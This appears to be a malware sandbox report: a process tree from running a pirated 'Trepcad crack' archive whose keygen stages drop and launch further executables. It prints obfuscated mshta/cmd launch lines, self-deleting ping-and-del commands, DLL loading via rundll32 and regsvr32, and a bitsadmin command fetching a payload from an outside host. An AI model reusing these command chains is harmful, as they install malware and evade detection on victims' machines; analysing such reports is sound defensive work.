"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8584 /prefetch:8
2⤵
PID:5112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8596 /prefetch:8
2⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8572 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8580 /prefetch:8
2⤵
PID:5156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4176 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
2⤵
PID:5268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8252 /prefetch:1
2⤵
PID:5328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
2⤵
PID:5392

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8684 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
2⤵
PID:5736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8668 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8684 /prefetch:8
2⤵
PID:5892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
2⤵
PID:6788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8700 /prefetch:8
2⤵
PID:6156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8480 /prefetch:8
2⤵
PID:4376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8368 /prefetch:8
2⤵
PID:408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8480 /prefetch:8
2⤵
PID:5492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1444 /prefetch:8
2⤵
PID:4816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1556 /prefetch:8
2⤵
PID:6504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9072 /prefetch:8
2⤵
PID:4844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:8
2⤵
PID:5992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1636 /prefetch:8
2⤵
PID:2632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7544 /prefetch:8
2⤵
PID:6192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7536 /prefetch:8
2⤵
PID:5512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7596 /prefetch:8
2⤵
PID:2152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2936

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
- Modifies registry class
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1028

C:\Users\Admin\AppData\Roaming\swvhtge
C:\Users\Admin\AppData\Roaming\swvhtge
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:6424

C:\Users\Admin\AppData\Roaming\atvhtge
C:\Users\Admin\AppData\Roaming\atvhtge
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5720

C:\Users\Admin\AppData\Roaming\atvhtge
C:\Users\Admin\AppData\Roaming\atvhtge
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:5036

C:\Users\Admin\AppData\Roaming\swvhtge
C:\Users\Admin\AppData\Roaming\swvhtge
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3436

C:\Users\Admin\AppData\Roaming\atvhtge
C:\Users\Admin\AppData\Roaming\atvhtge
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4564

C:\Users\Admin\AppData\Roaming\atvhtge
C:\Users\Admin\AppData\Roaming\atvhtge
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4940

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:60

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4160

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_crack_by_FFF.zip\Trepcad_6_6_00_crack_by_FFF.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_Trepcad_6_6_00_crack_by_FFF.zip\Trepcad_6_6_00_crack_by_FFF.exe"
1⤵
PID:5656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:5912

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
PID:4584

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:1084

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:5952

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
keygen-step-5.exe
3⤵
- Executes dropped EXE
PID:5988

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ).RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF """"== """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
4⤵
PID:4796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""== "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -iM "%~NXM" > nUl
5⤵
PID:2272

C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe
MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2
6⤵
- Executes dropped EXE
PID:5312

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBScRiPt: cLOsE (CREATeOBJECt( "wSCRIpT.shEll" ).RUN ( "cMd /C type ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" > MwwOA5GbuNV~Z.exe && sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF ""/pkpxuxwmNl2s_EnQNC5XPVi2 ""== """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe"" ) do taskkill /F -iM ""%~NXM"" > nUl " , 0 ) )
7⤵
PID:5420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C type "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" > MwwOA5GbuNV~Z.exe &&sTArT MwwOA5GbuNV~Z.exe /pkpxuxwmNl2s_EnQNC5XPVi2 & iF "/pkpxuxwmNl2s_EnQNC5XPVi2 "== "" for %M In ( "C:\Users\Admin\AppData\Local\Temp\MwwOA5GbuNV~Z.exe" ) do taskkill /F -iM "%~NXM" > nUl
8⤵
PID:1036

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /U -S .\5VOMHR.c
7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:5632

C:\Windows\SysWOW64\taskkill.exe
taskkill /F -iM "keygen-step-5.exe"
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5452

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:6004

C:\Users\Admin\AppData\Roaming\57E5.tmp.exe
"C:\Users\Admin\AppData\Roaming\57E5.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4804

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\57E5.tmp.exe"
5⤵
PID:4928

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:5096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
4⤵
PID:5296

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:5372

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:6012

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:5104

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:5388

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4772

C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\xiuhuali.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4808

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4128

C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5116

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
4⤵
- Executes dropped EXE
PID:5512

C:\Users\Admin\AppData\Local\Temp\is-V0FTS.tmp\Install.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V0FTS.tmp\Install.tmp" /SL5="$3032E,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:708

C:\Users\Admin\AppData\Local\Temp\is-A5Q8O.tmp\Ultra.exe
"C:\Users\Admin\AppData\Local\Temp\is-A5Q8O.tmp\Ultra.exe" /S /UID=burnerch1
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:1840

C:\Program Files\Google\DHWSJNEOLD\ultramediaburner.exe
"C:\Program Files\Google\DHWSJNEOLD\ultramediaburner.exe" /VERYSILENT
7⤵
- Executes dropped EXE
PID:6140

C:\Users\Admin\AppData\Local\Temp\is-05MOP.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-05MOP.tmp\ultramediaburner.tmp" /SL5="$30234,281924,62464,C:\Program Files\Google\DHWSJNEOLD\ultramediaburner.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5068

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
9⤵
- Executes dropped EXE
PID:4404

C:\Users\Admin\AppData\Local\Temp\b1-934d2-2b5-11d88-2e55987797e17\ZHogaefedaeqi.exe
"C:\Users\Admin\AppData\Local\Temp\b1-934d2-2b5-11d88-2e55987797e17\ZHogaefedaeqi.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:224

C:\Users\Admin\AppData\Local\Temp\7f-918ad-c07-2ca85-dea4a1025d986\Qepirewoby.exe
"C:\Users\Admin\AppData\Local\Temp\7f-918ad-c07-2ca85-dea4a1025d986\Qepirewoby.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jgufxkw5.hi2\instEU.exe & exit
8⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\jgufxkw5.hi2\instEU.exe
C:\Users\Admin\AppData\Local\Temp\jgufxkw5.hi2\instEU.exe
9⤵
- Executes dropped EXE
PID:5860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a42sn0ge.tlt\md1_1eaf.exe & exit
8⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\a42sn0ge.tlt\md1_1eaf.exe
C:\Users\Admin\AppData\Local\Temp\a42sn0ge.tlt\md1_1eaf.exe
9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ifrlypef.kvx\google-game.exe & exit
8⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\ifrlypef.kvx\google-game.exe
C:\Users\Admin\AppData\Local\Temp\ifrlypef.kvx\google-game.exe
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5832

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
10⤵
- Loads dropped DLL
PID:208

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hfowcztr.3jq\y1.exe & exit
8⤵
PID:4680

C:\Users\Admin\AppData\Local\Temp\hfowcztr.3jq\y1.exe
C:\Users\Admin\AppData\Local\Temp\hfowcztr.3jq\y1.exe
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4036

C:\Users\Admin\AppData\Local\Temp\RAEmu5ShNC.exe
"C:\Users\Admin\AppData\Local\Temp\RAEmu5ShNC.exe"
10⤵
- Executes dropped EXE
- Modifies system certificate store
PID:6984

C:\Users\Admin\AppData\Roaming\1619212869004.exe
"C:\Users\Admin\AppData\Roaming\1619212869004.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619212869004.txt"
11⤵
- Executes dropped EXE
PID:6724

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RAEmu5ShNC.exe"
11⤵
PID:6512

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
12⤵
- Runs ping.exe
PID:6584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u4mt3fmd.mhz\inst.exe & exit
8⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\u4mt3fmd.mhz\inst.exe
C:\Users\Admin\AppData\Local\Temp\u4mt3fmd.mhz\inst.exe
9⤵
- Executes dropped EXE
PID:6000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2hravjcm.iat\SunLabsPlayer.exe /S & exit
8⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\2hravjcm.iat\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\2hravjcm.iat\SunLabsPlayer.exe /S
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:5416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:6768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:5776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
PID:2836

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:5056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:7080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:6708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
- Checks for any installed AV software in registry
PID:508

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
10⤵
- Download via BitsAdmin
PID:4896

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
10⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5124

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
10⤵
- Executes dropped EXE
PID:4840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:4380

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:6428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:5316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:4356

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:652

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
10⤵
- Loads dropped DLL
PID:6784

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
11⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:6604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:4488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:4368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:4116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
